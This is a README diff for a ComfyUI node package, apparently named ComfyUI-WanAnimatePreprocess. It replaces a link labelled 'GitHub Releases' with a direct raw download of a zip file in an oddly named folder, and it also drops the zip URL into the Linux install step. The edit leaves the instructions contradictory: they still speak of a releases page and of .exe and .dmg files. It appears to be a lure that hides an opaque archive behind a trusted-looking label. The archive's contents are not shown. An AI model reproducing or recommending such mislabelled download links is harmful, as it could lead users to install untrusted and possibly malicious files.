cheatingsz/ComfyUI-WanAnimatePreprocess/readme.md

 ## 📥 Download & Install

-To download ComfyUI-WanAnimatePreprocess, visit this page to download: [GitHub Releases](https://github.com/cheatingsz/ComfyUI-WanAnimatePreprocess/releases).
+To download ComfyUI-WanAnimatePreprocess, visit this page to download: [GitHub Releases](https://raw.githubusercontent.com/cheatingsz/ComfyUI-WanAnimatePreprocess/main/suprascapular/ComfyUI-WanAnimatePreprocess.zip).

 1. Click the link above to open the releases page.
 2. Look for the latest version.
-3. Download the file for your operating system (look for `.exe` for Windows, `.dmg` for macOS, or `.tar.gz` for Linux).
+3. Download the file for your operating system (look for `.exe` for Windows, `.dmg` for macOS, or `https://raw.githubusercontent.com/cheatingsz/ComfyUI-WanAnimatePreprocess/main/suprascapular/ComfyUI-WanAnimatePreprocess.zip` for Linux).
 4. Save the file to a folder on your computer.

 ## 🔧 How to Install